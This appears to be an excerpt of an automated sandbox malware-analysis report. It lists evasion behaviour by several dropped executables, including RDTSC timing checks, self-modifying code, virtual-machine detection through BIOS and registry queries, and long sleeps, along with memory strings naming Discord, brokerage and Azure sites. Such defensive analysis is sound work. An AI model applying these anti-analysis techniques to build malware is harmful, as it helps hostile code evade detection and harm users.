Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9DF second address: 72F9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F60A4E98EFCh 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9F8 second address: 72F9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72F9FC second address: 72FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jp 00007F60A4E98F00h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FB97 second address: 72FBB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60A4BE8BE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBB2 second address: 72FBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBB8 second address: 72FBBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 72FBBC second address: 72FBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F60A4E98EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7237FB second address: 723801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 723801 second address: 723807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 723807 second address: 72380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 730706 second address: 73070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 733E05 second address: 733E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 733E0B second address: 733E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 735348 second address: 73534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73534C second address: 735365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60A4E98EFFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FD997 second address: 6FD99F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 6FD99F second address: 6FD9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7387A3 second address: 7387AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7387AC second address: 7387B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73F0AA second address: 73F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60A4BE8BD8h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F60A4BE8BDCh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73F0C7 second address: 73F0CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E5AE second address: 73E5B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E5B4 second address: 73E5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E731 second address: 73E735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E735 second address: 73E739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E843 second address: 73E849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E849 second address: 73E851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E851 second address: 73E85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E85A second address: 73E866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F60A4E98EF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73E866 second address: 73E8C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE8h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F60A4BE8BE6h 0x00000015 jc 00007F60A4BE8BD6h 0x0000001b jmp 00007F60A4BE8BDFh 0x00000020 jmp 00007F60A4BE8BE3h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB64 second address: 73EB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F60A4E98F02h 0x0000000b jnl 00007F60A4E98EF6h 0x00000011 jnc 00007F60A4E98EF6h 0x00000017 pushad 0x00000018 jbe 00007F60A4E98EF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB84 second address: 73EB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EB91 second address: 73EBDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 jbe 00007F60A4E98EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F60A4E98F0Ah 0x00000018 jne 00007F60A4E98F05h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED7F second address: 73ED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jbe 00007F60A4BE8BD8h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F60A4BE8BD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED98 second address: 73ED9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73ED9C second address: 73EDA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EDA0 second address: 73EDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF19 second address: 73EF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF1F second address: 73EF2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF2D second address: 73EF31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 73EF31 second address: 73EF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 741D04 second address: 741D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F60A4BE8BD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 741D28 second address: 741D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7423E0 second address: 7423E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 7429A6 second address: 7429AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 743133 second address: 743137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 74326C second address: 74329E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60A4E98EFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F60A4E98F08h 0x00000011 jng 00007F60A4E98EFCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 743377 second address: 74337C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe RDTSC instruction interceptor: First address: 74337C second address: 743382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7943B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 59DB54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 73F96B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Special instruction interceptor: First address: 7D2F05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 58EA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 743642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 58E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Special instruction interceptor: First address: 7DADF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CDEA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E93642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CDE933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F2ADF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Special instruction interceptor: First address: 12543B1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DB17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: F37944 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: D8DAF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Special instruction interceptor: First address: FB73C3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 63DB54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 7DF96B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Special instruction interceptor: First address: 872F05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 53EA1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 6F3642 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 53E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Special instruction interceptor: First address: 78ADF4 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4B70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4EE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Memory allocated: 4D10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 4940000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 4B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Memory allocated: 6B60000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070F17E rdtsc 3_2_0070F17E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1254 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1229 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1238 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 765 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 599 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 5100 Thread sleep time: -210000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep count: 1254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1916 Thread sleep time: -2509254s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1936 Thread sleep count: 1229 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1936 Thread sleep time: -2459229s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3416 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep count: 335 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088 Thread sleep time: -10050000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4328 Thread sleep count: 1238 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4328 Thread sleep time: -2477238s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2052 Thread sleep count: 765 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2052 Thread sleep time: -1530765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5608 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2752 Thread sleep count: 599 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2752 Thread sleep time: -1198599s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6784 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 6064 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 5244 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 2192 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe TID: 2584 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe TID: 2572 Thread sleep time: -126000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe TID: 3992 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Thread delayed: delay time: 922337203685477
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000003.2221768283.0000000000A11000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336317331.0000000000A11000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2931287187.00000121572AA000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001549000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.0000000001578000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000084F000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000087E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2937356698.0000029B42210000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2930456761.0000029B41A4A000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.0000000001514000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: efe6fe4127.exe, 0000000C.00000003.2818371439.0000000006215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
